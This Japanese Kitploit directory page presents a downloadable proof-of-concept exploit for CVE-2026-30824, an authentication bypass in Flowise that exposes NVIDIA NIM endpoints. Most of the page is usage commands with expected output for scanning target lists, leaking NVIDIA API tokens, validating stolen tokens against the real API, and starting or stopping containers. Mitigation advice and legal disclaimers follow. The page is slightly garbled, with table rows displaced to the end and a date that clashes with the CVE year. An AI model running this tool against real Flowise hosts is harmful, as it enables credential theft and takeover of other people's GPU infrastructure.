Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication — **CVE-2026-30824**の概念実証エクスプロイト。Flowiseにおける重大な認証バイパス脆弱性で、認証なしでNVIDIA NIM APIエンドポイントを公開します。 | Kitploit
ツール/GitHubGitHub/dylvie/cve-2026-30824-flowise-nvidia-nim-authentication
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用APIセキュリティテストペネトレーションテスト
GitHubdylvie/cve-2026-30824-flowise-nvidia-nim-authentication

CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication

**CVE-2026-30824**の概念実証エクスプロイト。Flowiseにおける重大な認証バイパス脆弱性で、認証なしでNVIDIA NIM APIエンドポイントを公開します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
94ヶ月前未レビュー

CVE-2026-30824 — Flowise NVIDIA NIM 認証バイパスチェッカーおよびエクスプロイト

CVE-2026-30824 の概念実証チェッカー兼エクスプロイトです。これは Flowise における重大な認証バイパス脆弱性であり、認証なしで NVIDIA NIM API エンドポイントを公開します。

脆弱性の概要

CVE-2026-30824 は Flowise (< 3.0.13) における重大な認証バイパスであり、認証されていないリモート攻撃者が NVIDIA NIM コンテナ管理および API トークン生成エンドポイントにアクセスできるようにします。

フィールド値
CVSS スコア9.8 (Critical)
CWECWE-306: 重要な機能に対する認証の欠如
影響を受けるバージョンFlowise < 3.0.13
影響完全なコンテナ管理、GPU アクセス、トークン窃取

根本原因

/api/v1/nvidia-nim/* パスがグローバル認証ミドルウェアでホワイトリストに登録されており、認証なしでのアクセスが可能です:

  • トークンの生成および漏洩
  • コンテナ管理 (一覧表示、開始、停止)
  • Docker イメージのプル
  • NVIDIA API 統合

機能

✅ 脆弱性検出 — ターゲットが脆弱かどうかを素早く確認
✅ トークン抽出 — 脆弱なエンドポイントから NVIDIA API トークンを漏洩
✅ トークン検証 — NVIDIA API に対してトークンを検証 (影響範囲の実証)
✅ コンテナ列挙 — 実行中の NIM コンテナを一覧表示
✅ バッチスキャン — ファイルから複数のターゲットをスキャン
✅ SSL バイパス — デフォルトで自己署名証明書を無視
✅ カラー出力 — 見やすいステータス表示 (緑/黄/赤)
✅ 偵察 — 完全なエンドポイントマッピングと診断


インストール

前提条件

  • Python 3.7+
  • requests ライブラリ

セットアップ

root@kitploit:~
# スクリプトをクローンまたはダウンロード
git clone <repository>
cd cve-2026-30824

# 依存関係をインストール
pip install -r requirements.txt
# または
pip install requests

使用方法

基本的な脆弱性チェック

root@kitploit:~
# 単一ターゲットが脆弱かどうかを確認
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check

# 期待される出力 (VULNERABLE):
# [+] Target appears VULNERABLE (HTTP 200)
#     Response: {...}

複数ターゲットのスキャン

root@kitploit:~
# 1行に1つのURLを記載した targets.txt を作成
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF

# すべてのターゲットをスキャン (高速モード、プロンプトなし)
python3 CVE-2026-30824.py -f targets.txt --scan-only

# 期待されるサマリー出力:
# ============================================================
# [*] Scan Summary
# ============================================================
# [+] VULNERABLE: 2
#     ✓ http://192.168.1.100:3000
#     ✓ http://192.168.1.101:3000
# [-] PATCHED: 1
#     ✗ http://192.168.1.102:3000

NVIDIA API トークンの抽出

root@kitploit:~
# 脆弱なエンドポイントから NVIDIA API トークンを漏洩
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 期待される出力:
# [*] Attempting to leak NVIDIA API token...
# [+] NVIDIA API Token: eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] Token Type: Bearer
# [+] Expires In: 3600s

NVIDIA API に対するトークンの検証

root@kitploit:~
# 漏洩したトークンが実際の NVIDIA API に対して機能するか検証
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."

# 期待される出力:
# [*] Validating token against NVIDIA API...
# [+] Token VALID! Access to 45 NVIDIA NIM models.
#     - mistralai/mistral-7b-instruct-v0.1
#     - meta-llama/llama2-70b
#     - (...)

実行中コンテナの一覧表示

root@kitploit:~
# ターゲット上のコンテナを列挙
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers

# 期待される出力:
# [*] Listing running containers...
# [+] HTTP 200
# [
#   {
#     "id": "abc123xyz",
#     "names": ["flowise_nim"],
#     "image": "nvcr.io/nvidia/nim:latest",
#     "state": "running"
#   }
# ]

完全な偵察 (すべてのチェック)

root@kitploit:~
# 脆弱なターゲットに対してすべての偵察チェックを実行
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

コマンドラインオプション

root@kitploit:~
usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
                             [--scan-only] [--get-token]
                             [--validate-token TOKEN] [--list-containers]
                             [--get-container CONTAINER_ID]
                             [--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
                             [--start-container IMAGE_TAG]
                             [--container-name CONTAINER_NAME]
                             [--stop-container CONTAINER_ID] [--preload]
                             [--all] [--timeout TIMEOUT] [--debug]

任意引数:
  -h, --help                    このヘルプメッセージを表示して終了
  -t, --target TARGET           ターゲット URL (例: http://192.168.1.100:3000)
  -f, --targets-file FILE       ターゲットのリストを含むファイル (1行に1つ)

脆弱性検出:
  --check                       ターゲットが脆弱かどうかのみ確認
  --scan-only                   プロンプトなしでターゲットの脆弱性をスキャン
  --debug                       リクエスト詳細と生のレスポンスを表示

エクスプロイト:
  --get-token                   NVIDIA API トークンを漏洩
  --validate-token TOKEN        NVIDIA API に対して漏洩したトークンを検証
  --list-containers             実行中の NIM コンテナを一覧表示
  --get-container CONTAINER_ID  コンテナの詳細を取得
  --get-image IMAGE_ID          イメージの詳細を取得
  --pull-image IMAGE_TAG        Docker イメージをプル (例: nvcr.io/nvidia/nim:latest)
  --start-container IMAGE_TAG   イメージタグからコンテナを起動
  --container-name NAME         起動したコンテナの名前
  --stop-container CONTAINER_ID 実行中のコンテナを停止
  --preload                     リソースプリロードエンドポイントをトリガー
  --all                         すべての偵察チェックを実行

詳細設定:
  --timeout SECONDS             リクエストタイムアウト (秒) (デフォルト: 15)

ワークフロー例

シナリオ 1: 内部ネットワーク評価

root@kitploit:~
# 1. サブネット全体をスキャンして脆弱なインスタンスを検出
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only

# 2. 脆弱な各ターゲットからトークンを抽出
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 3. トークンの影響を検証
python3 CVE-2026-30824.py --validate-token "<extracted-token>"

シナリオ 2: 影響の証明

root@kitploit:~
# 脆弱性を検証し、完全な影響範囲を実証
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

# これにより以下が実行されます:
# 1. 脆弱性のチェック
# 2. NVIDIA API トークンの抽出
# 3. NVIDIA API に対するトークンの検証
# 4. 実行中コンテナの一覧表示
# 5. リソース列挙の表示

シナリオ 3: 継続的モニタリング

root@kitploit:~
# ターゲットを定期的に監視 (cron またはスケジューラ経由)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log

出力インジケーター

色

  • 🟢 緑 — 脆弱なターゲットまたはエクスプロイト成功
  • 🟡 黄 — パッチ適用済み/脆弱でない、または警告
  • 🔴 赤 — エラーまたは接続失敗

ステータスコード

HTTP意味
200✅ 脆弱 (エンドポイントにアクセス可能)
400✅ 脆弱 (アプリケーションエラーだがエンドポイントは存在)
401🟡 パッチ適用済み (認証が必要)
404

トラブルシューティング

「HTML レスポンスが返された (JSON の代わりに)」

問題: エンドポイントが JSON API レスポンスの代わりに HTML ページを返します。

解決策:

  1. Flowise のバージョンが実際に脆弱であることを確認 (< 3.0.13)
  2. ターゲットが実際に Flowise を実行しているか確認 (別のアプリではない)
  3. このバージョンでエンドポイントパスが変更されていないか確認
  4. リバースプロキシまたは WAF が干渉していないか確認

「接続拒否」または「タイムアウト」

問題: ターゲットに到達できません。

解決策:

root@kitploit:~
# 接続性をテスト
curl -v http://192.168.1.100:3000/

# タイムアウトを延長
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check --timeout 30

SSL 証明書エラー

問題: ターゲットが自己署名または期限切れの証明書を使用しています。

解決策: スクリプトはデフォルトで SSL 検証を無効にします。問題が続く場合:

root@kitploit:~
# ポートとプロトコルを明示的に追加
python3 CVE-2026-30824.py -t https://192.168.1.100:3000 --check

トークン検証の失敗

問題: トークンは抽出されたが、NVIDIA API に対する検証が失敗します。

原因:

  • トークンがすでに期限切れの可能性
  • トークンが無効の可能性 (エンドポイントが偽のトークンを返す)
  • NVIDIA API へのネットワーク接続がブロックされている

セキュリティに関する考慮事項

⚠️ 法的通知

  • このツールは許可されたセキュリティテスト専用です
  • コンピュータシステムへの不正アクセスは違法です
  • 所有しているシステム、または明示的なテスト許可があるシステムのみテストしてください
  • 著者は誤用に対する責任を負いません

責任ある開示

この脆弱性を実環境で発見した場合:

  1. 調査結果を文書化する
  2. 組織のセキュリティチームに連絡する
  3. 修正に合理的な時間を許可する (通常 90 日)
  4. パッチが適用されるまで公開しない

緩和策

システム管理者向け

即時対応:

  1. Flowise をバージョン 3.0.13 以降にアップグレード
  2. ネットワークアクセス制御を実装 (ファイアウォールルール)
  3. 不要な場合は NVIDIA NIM 統合を無効化
  4. 不審なトークン使用がないか API ログを監視

長期的対策:

  1. WAF ルールを使用して /api/v1/nvidia-nim/* パスをブロック
  2. API レート制限を実装
  3. セキュリティ監視とアラートを有効化
  4. 定期的なセキュリティ評価を実施

開発者向け

  • コードベース内のすべての認証バイパスをレビュー
  • デフォルト拒否のアクセスポリシーを実装
  • 包括的な API エンドポイントセキュリティテストを追加
  • CI/CD で自動セキュリティスキャンを使用

参考情報

  • NVD エントリ
  • Flowise GitHub
  • NVIDIA NIM ドキュメント
  • CWE-306: 認証の欠如

ライセンス

このツールは教育目的および許可されたセキュリティテスト専用に提供されます。詳細は LICENSE ファイルを参照してください。

免責事項

このエクスプロイトは「現状のまま」保証なしで提供されます。所有しているシステム、または明示的な書面によるテスト許可があるシステムでのみ使用してください。著者はこのツールの誤用または損害について責任を負いません。


著者

許可された侵入テストおよびセキュリティ研究のために作成されました。

最終更新: 2026年4月

ツールをダウンロード
🟡 Flowise ではない、またはエンドポイントが存在しない
5xx🔴 サーバーエラー/設定ミス